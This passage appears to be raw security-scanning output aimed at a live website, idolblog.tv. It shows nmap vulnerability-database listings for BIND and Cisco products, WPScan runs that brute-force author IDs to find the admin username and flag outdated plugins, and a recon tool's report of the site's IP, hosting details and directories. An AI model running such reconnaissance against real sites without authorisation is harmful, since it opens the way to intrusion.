18008| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
18009| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
18010|
18011| SecurityFocus - https://www.securityfocus.com/bid/:
18012| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
18013| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
18014| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
18015| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
18016| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
18017| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
18018| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
18019| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
18020| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
18021| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
18022| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
18023| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
18024| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
18025| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
18026| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
18027| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
18028| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
18029| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
18030| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
18031| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
18032| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
18033| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
18034| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
18035| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
18036| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
18037| [100656] Cisco ASR 920 Series Routers CVE-2017-6795 Local Arbitrary File Overwrite Vulnerability
18038| [97450] Cisco ASR 903 and ASR 920 Series CVE-2017-6603 Denial of Service Vulnerability
18039| [93415] Cisco Nexus 9000 Series Switches CVE-2016-1455 Remote Information Disclosure Vulnerability
18040| [82579] Cisco Nexus 9000 Series ACI Mode Switches CVE-2015-6398 Denial of Service Vulnerability
18041| [77686] Cisco Firepower 9000 Series CVE-2015-6380 Unspecified OS Command Injection Vulnerability
18042| [77635] Cisco Firepower 9000 Series CVE-2015-6371 Multiple Arbitrary File Read Vulnerabilities
18043| [77634] Cisco Firepower 9000 Series CVE-2015-6370 Local Command Injection Vulnerability
18044| [77633] Cisco Firepower 9000 Series Switches CVE-2015-6372 HTML Injection Vulnerability
18045| [77631] Cisco Firepower 9000 Series Switches CVE-2015-6374 Clickjacking Vulnerability
18046| [77629] Cisco Firepower 9000 Series CVE-2015-6369 Local Denial of Service Vulnerability
18047| [77628] Cisco Firepower 9000 CVE-2015-6373 Cross Site Request Forgery Vulnerability
18048| [77614] Cisco Firepower 9000 Series Switches CVE-2015-6368 Information Disclosure Vulnerability
18049| [76913] Cisco NX-OS Software for Nexus 9000 Series Switches CVE-2015-6308 Denial of Service Vulnerability
18050| [76791] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-6301 Denial of Service Vulnerability
18051| [76762] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-6295 Denial of Service Vulnerability
18052| [76329] Cisco Nexus 9000 Series Software CVE-2015-4301 Remote Denial of Service Vulnerability
18053| [76057] Cisco Firepower 9000 Series Devices CVE-2015-4287 Information Disclosure Vulnerability
18054| [75471] Cisco Unified IP Phones 9900 Series CVE-2015-4226 Denial of Service Vulnerability
18055| [75378] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-4213 Information Disclosure Vulnerability
18056| [74029] Cisco ASR 9000 Series Routers CVE-2015-0694 Remote Security Bypass Vulnerability
18057| [73895] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-0686 Denial of Service Vulnerability
18058| [73470] Cisco ASR 9000 Series Routers CVE-2015-0685 Denial of Service Vulnerability
18059| [73318] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-0672 Denial of Service Vulnerability
18060| [72485] Cisco Unified IP Phones 9900 Series CVE-2015-0604 Arbitrary File Upload Vulnerability
18061| [72484] Cisco Unified IP Phones 9900 Series CVE-2015-0603 Local Denial of Service Vulnerability
18062| [72483] Cisco Unified IP Phones 9900 Series CVE-2015-0601 Local Denial of Service Vulnerability
18063| [72482] Cisco Unified IP Phones 9900 Series CVE-2015-0602 Information Disclosure Vulnerability
18064| [72481] Cisco Unified IP Phones 9900 Series CVE-2015-0600 Denial of Service Vulnerability
18065| [71979] Cisco MDS 9000 NX-OS Software CVE-2015-0582 Denial of Service Vulnerability
18066| [70744] Cisco ASR 901 Series Routers CVE-2014-3293 Denial of Service Vulnerability
18067| [70658] ZTE ZXDSL 931VII 'manager_dev_config_t.gch' Information Disclosure Vulnerability
18068| [69057] Cisco Nexus 9000 Series Switches CVE-2014-3330 Access List Security Bypass Vulnerability
18069| [64770] Cisco Unified IP Phones 9900 Series Crafted Header Unregister Denial of Service Vulnerability
18070| [63564] Cisco MDS 9000 NX-OS Software VRRP Frames Denial of Service Vulnerability
18071| [62944] Cisco Unified IP Phones 9900 Series CVE-2013-5532 Buffer Overflow Vulnerability
18072| [62943] Cisco Unified IP Phones 9900 Series CVE-2013-5533 Local Command Injection Vulnerability
18073| [62905] Cisco Unified IP Phones 9900 Series CVE-2013-5526 Denial of Service Vulnerability
18074| [61330] Cisco Unified IP Phones 9900 Series CVE-2013-3426 Arbitrary File Download Vulnerability
18075| [49633] Oracle Application Server 9i 'httpd.conf' Information Disclosure Vulnerability
18076| [48811] Cisco ASR 9000 Series Routers IP Version 4 Denial of Service Vulnerability
18077| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
18078| [15542] NetObjects Fusion 9 Information Disclosure Vulnerability
18079| [6556] Oracle 9i Application Server Sample Scripts Information Disclosure Vulnerability
18080| [6459] Oracle 9i Application Server Java Server Page Source Code Disclosure Vulnerability
18081| [5335] Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
18082| [4290] Oracle 9i Default Configuration File Information Disclosure Vulnerability
18083| [4034] Oracle 9IAS OracleJSP Information Disclosure Vulnerability
18084| [3848] Mandrake Bind 9 Package Insecure File Permissions Vulnerability
18085| [2516] Microsoft Plus! 98 Windows ME Password Disclosure Vulnerability
18086|
18087| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18088| [85799] Cisco Unified IP Phones 9900 Series directory traversal
18089| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
18090| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
18091| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
18092| [9250] BIND 9 dns_message_findtype() denial of service
18093| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
18094| [539] Microsoft Windows 95 and Internet Explorer password disclosure
18095| [86004] ISC BIND RDATA denial of service
18096| [84767] ISC BIND denial of service
18097| [83066] ISC BIND denial of service
18098| [81504] ISC BIND AAAA denial of service
18099| [80510] ISC BIND DNS64 denial of service
18100| [79121] ISC BIND queries denial of service
18101| [78479] ISC BIND RDATA denial of service
18102| [77185] ISC BIND TCP queries denial of service
18103| [77184] ISC BIND bad cache denial of service
18104| [76034] ISC BIND rdata denial of service
18105| [73053] ISC BIND cache update policy security bypass
18106| [71332] ISC BIND recursive queries denial of service
18107| [68375] ISC BIND UPDATE denial of service
18108| [68374] ISC BIND Response Policy Zones denial of service
18109| [67665] ISC BIND RRSIG Rrsets denial of service
18110| [67297] ISC BIND RRSIG denial of service
18111| [65554] ISC BIND IXFR transfer denial of service
18112| [63602] ISC BIND allow-query security bypass
18113| [63596] ISC BIND zone data security bypass
18114| [63595] ISC BIND RRSIG denial of service
18115| [62072] ISC BIND DNSSEC query denial of service
18116| [62071] ISC BIND ACL security bypass
18117| [61871] ISC BIND anchors denial of service
18118| [60421] ISC BIND RRSIG denial of service
18119| [56049] ISC BIND out-of-bailiwick weak security
18120| [55937] ISC Bind unspecified cache poisoning
18121| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
18122| [54416] ISC BIND DNSSEC cache poisoning
18123| [52073] ISC BIND dns_db_findrdataset() denial of service
18124| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
18125| [45234] ISC BIND UDP denial of service
18126| [39670] ISC BIND inet_network buffer overflow
18127| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
18128| [37128] RHSA update for ISC BIND RRset denial of service not installed
18129| [37127] RHSA update for ISC BIND named service denial of service not installed
18130| [36275] ISC BIND DNS query spoofing
18131| [35575] ISC BIND query ID cache poisoning
18132| [35571] ISC BIND ACL security bypass
18133| [31838] ISC BIND RRset denial of service
18134| [31799] ISC BIND named service denial of service
18135| [29876] HP Tru64 ypbind core dump information disclosure
18136| [28745] ISC BIND DNSSEC RRset denial of service
18137| [28744] ISC BIND recursive INSIST denial of service
18138| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
18139| [18836] BIND hostname disclosure
18140| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
18141| [10333] ISC BIND SIG null pointer dereference denial of service
18142| [10332] ISC BIND OPT resource record (RR) denial of service
18143| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
18144| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
18145| [5814] ISC BIND "
18146| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
18147| [5462] ISC BIND AXFR host command remote buffer overflow
18148|
18149| Exploit-DB - https://www.exploit-db.com:
18150| [24689] cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure
18151| [23059] Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability
18152| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
18153|
18154| OpenVAS (Nessus) - http://www.openvas.org:
18155| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
18156| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
18157| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
18158| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
18159| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
18160| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
18161| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
18162| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
18163| [11226] Oracle 9iAS default error information disclosure
18164|
18165| SecurityTracker - https://www.securitytracker.com:
18166| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
18167| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
18168| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
18169| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
18170| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
18171| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18172| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18173| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18174| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18175| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18176| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18177| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18178| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18179| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
18180| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
18181| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
18182| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
18183| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
18184| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
18185| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
18186| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
18187| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
18188| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
18189| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
18190| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
18191| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
18192|
18193| OSVDB - http://www.osvdb.org:
18194| [86219] Cardiac Science G3 Plus 9390A-501 AED AEDUpdate Cleartext Password Local Disclosure
18195| [22517] MPN HP-180W Wireless IP Phone UDP Port 9090 Information Disclosure
18196| [22516] ZyXEL P-2000W_v2 VoIP Wi-Fi Phone UDP Port 9090 Information Disclosure
18197| [21292] ZyXEL P2000W UDP 9090 Remote Information Disclosure
18198|_
1819967/udp closed dhcps
1820068/udp closed dhcpc
1820169/udp closed tftp
1820288/udp closed kerberos-sec
18203123/udp closed ntp
18204137/udp filtered netbios-ns
18205138/udp filtered netbios-dgm
18206139/udp closed netbios-ssn
18207161/udp closed snmp
18208162/udp closed snmptrap
18209389/udp closed ldap
18210520/udp closed route
182112049/udp closed nfs
18212Too many fingerprints match this host to give specific OS details
18213Network Distance: 9 hops
18214Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
18215
18216TRACEROUTE (using port 137/udp)
18217HOP RTT ADDRESS
182181 ... 2
182193 169.35 ms 10.247.200.1
182204 171.90 ms 10.247.200.1
182215 171.89 ms 10.247.200.1
182226 171.88 ms 10.247.200.1
182237 171.86 ms 10.247.200.1
182248 171.78 ms 10.247.200.1
182259 171.79 ms 10.247.200.1
1822610 170.85 ms 10.247.200.1
1822711 ... 18
1822819 170.41 ms 10.247.200.1
1822920 172.95 ms 10.247.200.1
1823021 ... 27
1823128 171.08 ms 10.247.200.1
1823229 ...
1823330 169.24 ms 10.247.200.1
18234
18235NSE: Script Post-scanning.
18236Initiating NSE at 04:12
18237Completed NSE at 04:12, 0.00s elapsed
18238Initiating NSE at 04:12
18239Completed NSE at 04:12, 0.00s elapsed
18240Read data files from: /usr/bin/../share/nmap
18241OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
18242Nmap done: 1 IP address (1 host up) scanned in 27.55 seconds
18243 Raw packets sent: 129 (9.573KB) | Rcvd: 239 (37.313KB)
18244#######################################################################################################################################
18245[+] URL: http://idolblog.tv/
18246[+] Started: Sat Jul 20 02:50:14 2019
18247
18248Interesting Finding(s):
18249
18250[+] http://idolblog.tv/
18251 | Interesting Entries:
18252 | - Server: Apache/2
18253 | - Upgrade: h2,h2c
18254 | - X-Powered-By: PHP/5.6.35
18255 | Found By: Headers (Passive Detection)
18256 | Confidence: 100%
18257
18258[+] http://idolblog.tv/robots.txt
18259 | Interesting Entries:
18260 | - /wp-admin/
18261 | - /wp-admin/admin-ajax.php
18262 | Found By: Robots Txt (Aggressive Detection)
18263 | Confidence: 100%
18264
18265[+] http://idolblog.tv/xmlrpc.php
18266 | Found By: Link Tag (Passive Detection)
18267 | Confidence: 100%
18268 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
18269 | References:
18270 | - http://codex.wordpress.org/XML-RPC_Pingback_API
18271 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
18272 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
18273 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
18274 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18275
18276[+] http://idolblog.tv/readme.html
18277 | Found By: Direct Access (Aggressive Detection)
18278 | Confidence: 100%
18279
18280[+] http://idolblog.tv/wp-cron.php
18281 | Found By: Direct Access (Aggressive Detection)
18282 | Confidence: 60%
18283 | References:
18284 | - https://www.iplocation.net/defend-wordpress-from-ddos
18285 | - https://github.com/wpscanteam/wpscan/issues/1299
18286
18287[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
18288 | Detected By: Rss Generator (Passive Detection)
18289 | - http://idolblog.tv/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18290 | - http://idolblog.tv/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18291
18292[+] WordPress theme in use: twentytwelve
18293 | Location: http://idolblog.tv/wp-content/themes/twentytwelve/
18294 | Last Updated: 2019-05-07T00:00:00.000Z
18295 | [!] The version is out of date, the latest version is 3.0
18296 | Style URL: http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2
18297 | Style Name: Twenty Twelve
18298 | Style URI: http://wordpress.org/themes/twentytwelve
18299 | Description: The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features in...
18300 | Author: the WordPress team
18301 | Author URI: http://wordpress.org/
18302 |
18303 | Detected By: Css Style (Passive Detection)
18304 |
18305 | Version: 1.3 (80% confidence)
18306 | Detected By: Style (Passive Detection)
18307 | - http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2, Match: 'Version: 1.3'
18308
18309[+] Enumerating All Plugins (via Passive Methods)
18310[+] Checking Plugin Versions (via Passive and Aggressive Methods)
18311
18312[i] Plugin(s) Identified:
18313
18314[+] bwp-recent-comments
18315 | Location: http://idolblog.tv/wp-content/plugins/bwp-recent-comments/
18316 | Latest Version: 1.2.2 (up to date)
18317 | Last Updated: 2013-10-28T07:51:00.000Z
18318 |
18319 | Detected By: Urls In Homepage (Passive Detection)
18320 |
18321 | Version: 1.2.2 (100% confidence)
18322 | Detected By: Readme - Stable Tag (Aggressive Detection)
18323 | - http://idolblog.tv/wp-content/plugins/bwp-recent-comments/readme.txt
18324 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
18325 | - http://idolblog.tv/wp-content/plugins/bwp-recent-comments/readme.txt
18326
18327[+] wp-pagenavi
18328 | Location: http://idolblog.tv/wp-content/plugins/wp-pagenavi/
18329 | Last Updated: 2018-12-19T04:50:00.000Z
18330 | [!] The version is out of date, the latest version is 2.93
18331 |
18332 | Detected By: Urls In Homepage (Passive Detection)
18333 |
18334 | Version: 2.92 (80% confidence)
18335 | Detected By: Readme - Stable Tag (Aggressive Detection)
18336 | - http://idolblog.tv/wp-content/plugins/wp-pagenavi/readme.txt
18337
18338[+] Enumerating Config Backups (via Passive and Aggressive Methods)
18339 Checking Config Backups - Time: 00:00:04 <=============> (21 / 21) 100.00% Time: 00:00:04
18340
18341[i] No Config Backups Found.
18342
18343
18344[+] Finished: Sat Jul 20 02:50:44 2019
18345[+] Requests Done: 46
18346[+] Cached Requests: 18
18347[+] Data Sent: 9.071 KB
18348[+] Data Received: 195.779 KB
18349[+] Memory used: 182.906 MB
18350[+] Elapsed time: 00:00:30
18351#######################################################################################################################################
18352[+] URL: http://idolblog.tv/
18353[+] Started: Sat Jul 20 02:50:09 2019
18354
18355Interesting Finding(s):
18356
18357[+] http://idolblog.tv/
18358 | Interesting Entries:
18359 | - Server: Apache/2
18360 | - Upgrade: h2,h2c
18361 | - X-Powered-By: PHP/5.6.35
18362 | Found By: Headers (Passive Detection)
18363 | Confidence: 100%
18364
18365[+] http://idolblog.tv/robots.txt
18366 | Interesting Entries:
18367 | - /wp-admin/
18368 | - /wp-admin/admin-ajax.php
18369 | Found By: Robots Txt (Aggressive Detection)
18370 | Confidence: 100%
18371
18372[+] http://idolblog.tv/xmlrpc.php
18373 | Found By: Link Tag (Passive Detection)
18374 | Confidence: 100%
18375 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
18376 | References:
18377 | - http://codex.wordpress.org/XML-RPC_Pingback_API
18378 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
18379 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
18380 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
18381 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18382
18383[+] http://idolblog.tv/readme.html
18384 | Found By: Direct Access (Aggressive Detection)
18385 | Confidence: 100%
18386
18387[+] http://idolblog.tv/wp-cron.php
18388 | Found By: Direct Access (Aggressive Detection)
18389 | Confidence: 60%
18390 | References:
18391 | - https://www.iplocation.net/defend-wordpress-from-ddos
18392 | - https://github.com/wpscanteam/wpscan/issues/1299
18393
18394[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
18395 | Detected By: Rss Generator (Passive Detection)
18396 | - http://idolblog.tv/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18397 | - http://idolblog.tv/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18398
18399[+] WordPress theme in use: twentytwelve
18400 | Location: http://idolblog.tv/wp-content/themes/twentytwelve/
18401 | Last Updated: 2019-05-07T00:00:00.000Z
18402 | [!] The version is out of date, the latest version is 3.0
18403 | Style URL: http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2
18404 | Style Name: Twenty Twelve
18405 | Style URI: http://wordpress.org/themes/twentytwelve
18406 | Description: The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features in...
18407 | Author: the WordPress team
18408 | Author URI: http://wordpress.org/
18409 |
18410 | Detected By: Css Style (Passive Detection)
18411 |
18412 | Version: 1.3 (80% confidence)
18413 | Detected By: Style (Passive Detection)
18414 | - http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2, Match: 'Version: 1.3'
18415
18416[+] Enumerating Users (via Passive and Aggressive Methods)
18417 Brute Forcing Author IDs - Time: 00:00:06 <==> (10 / 10) 100.00% Time: 00:00:06
18418
18419[i] User(s) Identified:
18420
18421[+] idolblog
18422 | Detected By: Rss Generator (Passive Detection)
18423 | Confirmed By:
18424 | Wp Json Api (Aggressive Detection)
18425 | - http://idolblog.tv/wp-json/wp/v2/users/?per_page=100&page=1
18426 | Rss Generator (Aggressive Detection)
18427 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
18428 | Login Error Messages (Aggressive Detection)
18429
18430
18431[+] Finished: Sat Jul 20 02:51:05 2019
18432[+] Requests Done: 58
18433[+] Cached Requests: 7
18434[+] Data Sent: 11.261 KB
18435[+] Data Received: 937.319 KB
18436[+] Memory used: 87.531 MB
18437[+] Elapsed time: 00:00:56
18438#######################################################################################################################################
18439[+] URL: http://idolblog.tv/
18440[+] Started: Sat Jul 20 02:54:56 2019
18441
18442Interesting Finding(s):
18443
18444[+] http://idolblog.tv/
18445 | Interesting Entries:
18446 | - Server: Apache/2
18447 | - Upgrade: h2,h2c
18448 | - X-Powered-By: PHP/5.6.35
18449 | Found By: Headers (Passive Detection)
18450 | Confidence: 100%
18451
18452[+] http://idolblog.tv/robots.txt
18453 | Interesting Entries:
18454 | - /wp-admin/
18455 | - /wp-admin/admin-ajax.php
18456 | Found By: Robots Txt (Aggressive Detection)
18457 | Confidence: 100%
18458
18459[+] http://idolblog.tv/xmlrpc.php
18460 | Found By: Link Tag (Passive Detection)
18461 | Confidence: 100%
18462 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
18463 | References:
18464 | - http://codex.wordpress.org/XML-RPC_Pingback_API
18465 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
18466 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
18467 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
18468 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18469
18470[+] http://idolblog.tv/readme.html
18471 | Found By: Direct Access (Aggressive Detection)
18472 | Confidence: 100%
18473
18474[+] http://idolblog.tv/wp-cron.php
18475 | Found By: Direct Access (Aggressive Detection)
18476 | Confidence: 60%
18477 | References:
18478 | - https://www.iplocation.net/defend-wordpress-from-ddos
18479 | - https://github.com/wpscanteam/wpscan/issues/1299
18480
18481[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
18482 | Detected By: Rss Generator (Passive Detection)
18483 | - http://idolblog.tv/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18484 | - http://idolblog.tv/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
18485
18486[+] WordPress theme in use: twentytwelve
18487 | Location: http://idolblog.tv/wp-content/themes/twentytwelve/
18488 | Last Updated: 2019-05-07T00:00:00.000Z
18489 | [!] The version is out of date, the latest version is 3.0
18490 | Style URL: http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2
18491 | Style Name: Twenty Twelve
18492 | Style URI: http://wordpress.org/themes/twentytwelve
18493 | Description: The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features in...
18494 | Author: the WordPress team
18495 | Author URI: http://wordpress.org/
18496 |
18497 | Detected By: Css Style (Passive Detection)
18498 |
18499 | Version: 1.3 (80% confidence)
18500 | Detected By: Style (Passive Detection)
18501 | - http://idolblog.tv/wp-content/themes/twentytwelve/style.css?ver=5.2.2, Match: 'Version: 1.3'
18502
18503[+] Enumerating Users (via Passive and Aggressive Methods)
18504 Brute Forcing Author IDs - Time: 00:00:03 <============> (10 / 10) 100.00% Time: 00:00:03
18505
18506[i] User(s) Identified:
18507
18508[+] idolblog
18509 | Detected By: Rss Generator (Passive Detection)
18510 | Confirmed By:
18511 | Wp Json Api (Aggressive Detection)
18512 | - http://idolblog.tv/wp-json/wp/v2/users/?per_page=100&page=1
18513 | Rss Generator (Aggressive Detection)
18514 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
18515 | Login Error Messages (Aggressive Detection)
18516
18517
18518[+] Finished: Sat Jul 20 02:55:13 2019
18519[+] Requests Done: 14
18520[+] Cached Requests: 51
18521[+] Data Sent: 2.756 KB
18522[+] Data Received: 25.951 KB
18523[+] Memory used: 86.953 MB
18524[+] Elapsed time: 00:00:16
18525#######################################################################################################################################
18526[INFO] Date: 20/07/19 | Time: 02:55:40
18527[INFO] ------TARGET info------
18528[*] TARGET: http://idolblog.tv/
18529[*] TARGET IP: 89.248.174.131
18530[INFO] NO load balancer detected for idolblog.tv...
18531[*] DNS servers: ns1.dnsowl.com.
18532[*] TARGET server: Apache/2
18533[*] CC: NL
18534[*] Country: Netherlands
18535[*] RegionCode: NH
18536[*] RegionName: North Holland
18537[*] City: Amsterdam
18538[*] ASN: AS202425
18539[*] BGP_PREFIX: 89.248.174.0/24
18540[*] ISP: INT-NETWORK IP Volume inc, SC
18541[INFO] DNS enumeration:
18542[INFO] Possible abuse mails are:
18543[*] abuse@idolblog.tv
18544[*] abuse@quasinetworks.com
18545[INFO] NO PAC (Proxy Auto Configuration) file FOUND
18546[ALERT] robots.txt file FOUND in http://idolblog.tv/robots.txt
18547[INFO] Checking for HTTP status codes recursively from http://idolblog.tv/robots.txt
18548[INFO] Status code Folders
18549[*] 200 http://idolblog.tv/wp-admin/
18550[INFO] Starting FUZZing in http://idolblog.tv/FUzZzZzZzZz...
18551[INFO] Status code Folders
18552[ALERT] Look in the source code. It may contain passwords
18553[INFO] Links found from http://idolblog.tv/ http://89.248.174.131/:
18554[*] http://amateurblog.tv/
18555[*] http://eastblog.tv/
18556[*] http://idolblog.tv/
18557[*] http://idolblog.tv/about
18558[*] http://idolblog.tv/about/
18559[*] http://idolblog.tv/ami-moecco-tv-pigtails/
18560[*] http://idolblog.tv/anjyu-kouzuki-set-18/
18561[*] http://idolblog.tv/category/at-crepe/
18562[*] http://idolblog.tv/category/blog-posts/
18563[*] http://idolblog.tv/category/bomb-tv/
18564[*] http://idolblog.tv/category/dgcidol-jp/
18565[*] http://idolblog.tv/category/dvds/
18566[*] http://idolblog.tv/category/featured-posts/
18567[*] http://idolblog.tv/category/girlz-high/
18568[*] http://idolblog.tv/category/imouto-tv/
18569[*] http://idolblog.tv/category/lovepop/
18570[*] http://idolblog.tv/category/milkkiss-com/
18571[*] http://idolblog.tv/category/minisuka-tv/
18572[*] http://idolblog.tv/category/moecco-tv/
